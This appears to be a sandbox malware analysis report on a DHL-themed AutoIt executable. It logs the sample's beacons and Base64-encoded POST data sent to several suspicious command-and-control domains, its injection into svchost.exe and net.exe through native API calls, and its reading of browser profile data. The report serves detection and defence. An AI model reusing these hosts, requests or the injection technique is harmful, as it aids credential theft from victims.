    GET /aajw/?Qz=BJvp0BdhxXiTCTGP&XbDhGVR=lJ+qR9qEWHtEYfdYXX38H63zdICQzTmBsURfekuXE7iDW/5kFwCD5SzXO8//IXYeWe3pPDw5e3u+RAlULoDse9ZEd7r2QSdjEk66OCO0EG57H2Th8v5BKcw= HTTP/1.1
    Host: www.comvq.fun
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-us
    Connection: close
    User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4
Source: global traffic, DNS traffic detected: DNS query: www.iuyi542.xyz
Source: global traffic, DNS traffic detected: DNS query: www.vrxlzluy.shop
Source: global traffic, DNS traffic detected: DNS query: www.trifecta.center
Source: global traffic, DNS traffic detected: DNS query: www.wcp95.top
Source: global traffic, DNS traffic detected: DNS query: www.gokulmohan.online
Source: global traffic, DNS traffic detected: DNS query: www.wddb97.top
Source: global traffic, DNS traffic detected: DNS query: www.xtelify.tech
Source: global traffic, DNS traffic detected: DNS query: www.roopiedutech.online
Source: global traffic, DNS traffic detected: DNS query: www.comvq.fun
Source: global traffic, DNS traffic detected: DNS query: www.harmonid.life
                Source: unknownHTTP traffic detected: POST /o91n/ HTTP/1.1Host: www.vrxlzluy.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-usCache-Control: no-cacheConnection: closeContent-Length: 204Content-Type: application/x-www-form-urlencodedOrigin: http://www.vrxlzluy.shopReferer: http://www.vrxlzluy.shop/o91n/User-Agent: Mozilla/5.0 (X11; U; Linux i686; sk; rv:1.9.0.4) Gecko/2008111217 Fedora/3.0.4-1.fc10 Firefox/3.0.4Data Raw: 58 62 44 68 47 56 52 3d 65 6a 42 61 32 59 47 74 50 65 6f 70 49 41 64 75 6a 74 31 70 61 41 52 33 35 43 58 58 6d 79 61 49 2f 6d 35 59 48 59 6e 51 37 74 4b 51 73 72 2b 5a 48 2b 2b 4c 42 55 48 79 4c 6c 38 66 53 39 67 7a 36 6d 48 4c 42 63 67 65 33 57 75 77 34 2b 45 45 79 62 50 59 56 2b 6f 79 45 77 6b 78 49 74 4d 4b 48 76 58 46 4f 6b 46 61 6d 4e 79 49 57 47 64 58 61 34 6f 4b 74 6c 5a 54 51 56 30 6b 61 68 76 76 4b 50 79 32 4e 74 7a 72 6c 76 62 2f 64 34 73 76 61 48 5a 67 47 52 6c 2f 48 44 66 32 30 55 54 50 51 63 56 72 5a 63 42 5a 75 5a 4f 58 42 4f 65 70 6b 68 69 53 54 32 32 75 34 4d 4c 32 73 61 4f 39 6a 77 3d 3d Data Ascii: XbDhGVR=ejBa2YGtPeopIAdujt1paAR35CXXmyaI/m5YHYnQ7tKQsr+ZH++LBUHyLl8fS9gz6mHLBcge3Wuw4+EEybPYV+oyEwkxItMKHvXFOkFamNyIWGdXa4oKtlZTQV0kahvvKPy2Ntzrlvb/d4svaHZgGRl/HDf20UTPQcVrZcBZuZOXBOepkhiST22u4ML2saO9jw==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 01 Nov 2024 18:43:45 GMTContent-Type: text/htmlContent-Length: 167433Connection: closeETag: "652641ca-28e09"
                Source: net.exe, 00000007.00000002.3519002309.00000000043C2000.00000004.10000000.00040000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000009.00000002.3518574078.0000000003A72000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://roopiedutech.online/3m9t/?XbDhGVR=siOGj5B0XutXYSucsd0fIKR0LQH5vUluc52n7Rs3scAygCFhnhDrxADoQHi
                Source: net.exe, 00000007.00000002.3519002309.0000000003F0C000.00000004.10000000.00040000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000009.00000002.3518574078.00000000035BC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.gokulmohan.online/xh7d/?XbDhGVR=lbj31sdPKdIucqFOkkGE3KM3
                Source: AUHJGnjYgKTjWw.exe, 00000009.00000002.3520205826.0000000005026000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.harmonid.life
                Source: AUHJGnjYgKTjWw.exe, 00000009.00000002.3520205826.0000000005026000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.harmonid.life/aq3t/
                Source: net.exe, 00000007.00000003.2314174450.000000000776D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: net.exe, 00000007.00000003.2314174450.000000000776D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: net.exe, 00000007.00000003.2314174450.000000000776D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: net.exe, 00000007.00000003.2314174450.000000000776D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: net.exe, 00000007.00000003.2314174450.000000000776D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: net.exe, 00000007.00000003.2314174450.000000000776D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: net.exe, 00000007.00000003.2314174450.000000000776D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: net.exe, 00000007.00000002.3519002309.00000000038C4000.00000004.10000000.00040000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000009.00000002.3518574078.0000000002F74000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2418472075.000000001FFB4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://getbootstrap.com/)
                Source: net.exe, 00000007.00000002.3519002309.00000000038C4000.00000004.10000000.00040000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000009.00000002.3518574078.0000000002F74000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2418472075.000000001FFB4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
                Source: net.exe, 00000007.00000002.3517458773.00000000006AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: net.exe, 00000007.00000002.3517458773.00000000006AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: net.exe, 00000007.00000002.3517458773.00000000006AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: net.exe, 00000007.00000002.3517458773.00000000006AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: net.exe, 00000007.00000002.3517458773.00000000006AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: net.exe, 00000007.00000002.3517458773.00000000006AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: net.exe, 00000007.00000003.2306623839.000000000774C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: net.exe, 00000007.00000002.3519002309.0000000003A56000.00000004.10000000.00040000.00000000.sdmp, AUHJGnjYgKTjWw.exe, 00000009.00000002.3518574078.0000000003106000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://vrxlzluy.shop/o91n/?XbDhGVR=Thp61v6sOdtIOU1AhqZOcShyli3Q2Rus
                Source: net.exe, 00000007.00000003.2314174450.000000000776D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: net.exe, 00000007.00000003.2314174450.000000000776D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_0084EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0084EAFF
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_0084ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0084ED6A
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_0083AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_0083AA57
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exeCode function: 0_2_00869576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00869576

                E-Banking Fraud

                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2108161360.0000000003820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3518328881.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3518268838.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.3517222370.0000000000480000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3518477270.0000000003CC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2108497197.0000000005400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2107863042.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3520205826.0000000004FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: DHL_IMPORT_8236820594.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: DHL_IMPORT_8236820594.exe, 00000000.00000000.1659040900.0000000000892000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_cbd6a012-0
                Source: DHL_IMPORT_8236820594.exe, 00000000.00000000.1659040900.0000000000892000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_8c8a5f66-b
                Source: DHL_IMPORT_8236820594.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_14691e13-5
Source: DHL_IMPORT_8236820594.exe | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_9947b83a-b
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042CC23 NtClose
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972B60 NtClose, LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972DF0 NtQuerySystemInformation, LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039735C0 NtCreateMutant, LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03974340 NtSetContextThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03974650 NtSuspendThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972B80 NtQueryInformationFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972BA0 NtEnumerateValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972BF0 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972BE0 NtQueryValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972AB0 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972AD0 NtReadFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972AF0 NtWriteFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972F90 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972FB0 NtResumeThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972FA0 NtQuerySection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972FE0 NtCreateFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972F30 NtCreateSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972F60 NtCreateProcessEx
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972E80 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972EA0 NtAdjustPrivilegesToken
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972EE0 NtQueueApcThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972E30 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972DB0 NtEnumerateKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972DD0 NtDelayExecution
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972D10 NtMapViewOfSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972D00 NtSetInformationFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972D30 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972CA0 NtQueryInformationToken
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972CC0 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972CF0 NtOpenProcess
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972C00 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972C70 NtFreeVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03972C60 NtCreateKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03973090 NtSetValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03973010 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039739B0 NtGetContextThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03973D10 NtOpenProcessToken
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03973D70 NtOpenThread
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F24340 NtSetContextThread, LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F24650 NtSuspendThread, LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F22AF0 NtWriteFile, LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F22AD0 NtReadFile, LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F22BF0 NtAllocateVirtualMemory, LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F22BE0 NtQueryValueKey, LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F22BA0 NtEnumerateValueKey, LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F22B60 NtClose, LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F22EE0 NtQueueApcThread, LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F22E80 NtReadVirtualMemory, LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F22FE0 NtCreateFile, LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F22FB0 NtResumeThread, LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F22F30 NtCreateSection, LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F22CA0 NtQueryInformationToken, LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F22C70 NtFreeVirtualMemory, LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F22C60 NtCreateKey, LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F22DF0 NtQuerySystemInformation, LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F22DD0 NtDelayExecution, LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F22D30 NtUnmapViewOfSection, LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F22D10 NtMapViewOfSection, LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F235C0 NtCreateMutant, LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F239B0 NtGetContextThread, LdrInitializeThunk
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F22AB0 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F22B80 NtQueryInformationFile
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F22EA0 NtAdjustPrivilegesToken
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F22E30 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F22FA0 NtQuerySection
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F22F90 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F22F60 NtCreateProcessEx
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F22CF0 NtOpenProcess
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F22CC0 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F22C00 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F22DB0 NtEnumerateKey
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F22D00 NtSetInformationFile
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F23090 NtSetValueKey
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F23010 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F23D70 NtOpenThread
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_02F23D10 NtOpenProcessToken
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_004A9400 NtCreateFile
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_004A9560 NtReadFile
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_004A9650 NtDeleteFile
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_004A96F0 NtClose
Source: C:\Windows\SysWOW64\net.exe | Code function: 7_2_004A9850 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Code function: 0_2_0083D5EB: CreateFileW, DeviceIoControl, CloseHandle
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Code function: 0_2_00831201 LogonUserW, DuplicateTokenEx, CloseHandle, OpenWindowStationW, GetProcessWindowStation, SetProcessWindowStation, OpenDesktopW, _wcslen, LoadUserProfileW, CreateEnvironmentBlock, CreateProcessAsUserW, UnloadUserProfile, GetProcessHeap, HeapFree, CloseWindowStation, CloseDesktop, SetProcessWindowStation, CloseHandle, DestroyEnvironmentBlock
Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Code function: 0_2_0083E8F6 ExitWindowsEx, InitiateSystemShutdownExW, SetSystemPowerState
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_004ABD307_2_004ABD30
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02BFE3147_2_02BFE314
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02BFE7D27_2_02BFE7D2
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02BFE4337_2_02BFE433
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02BFCB387_2_02BFCB38
                Source: C:\Windows\SysWOW64\net.exeCode function: 7_2_02BFD8987_2_02BFD898
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0392B970 appears 262 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03975130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 039AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 039BF290 appears 103 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03987E54 appears 107 times
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Code function: String function: 007F0A30 appears 46 times
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Code function: String function: 007EF9F2 appears 31 times
                Source: C:\Windows\SysWOW64\net.exe | Code function: String function: 02F37E54 appears 107 times
                Source: C:\Windows\SysWOW64\net.exe | Code function: String function: 02EDB970 appears 262 times
                Source: C:\Windows\SysWOW64\net.exe | Code function: String function: 02F6F290 appears 103 times
                Source: C:\Windows\SysWOW64\net.exe | Code function: String function: 02F25130 appears 58 times
                Source: C:\Windows\SysWOW64\net.exe | Code function: String function: 02F5EA12 appears 86 times
                Source: DHL_IMPORT_8236820594.exe, 00000000.00000003.1836861293.0000000003FDD000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs DHL_IMPORT_8236820594.exe
                Source: DHL_IMPORT_8236820594.exe, 00000000.00000003.1836622224.0000000003C93000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs DHL_IMPORT_8236820594.exe
                Source: DHL_IMPORT_8236820594.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@9/2@10/9
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Code function: 0_2_008437B5 GetLastError,FormatMessageW
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Code function: 0_2_008310BF AdjustTokenPrivileges,CloseHandle
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Code function: 0_2_008316C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Code function: 0_2_008451CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Code function: 0_2_0085A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Code function: 0_2_0084648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Code function: 0_2_007D42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | File created: C:\Users\user\AppData\Local\Temp\unprickly
                Source: DHL_IMPORT_8236820594.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\DHL_IMPORT_8236820594.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
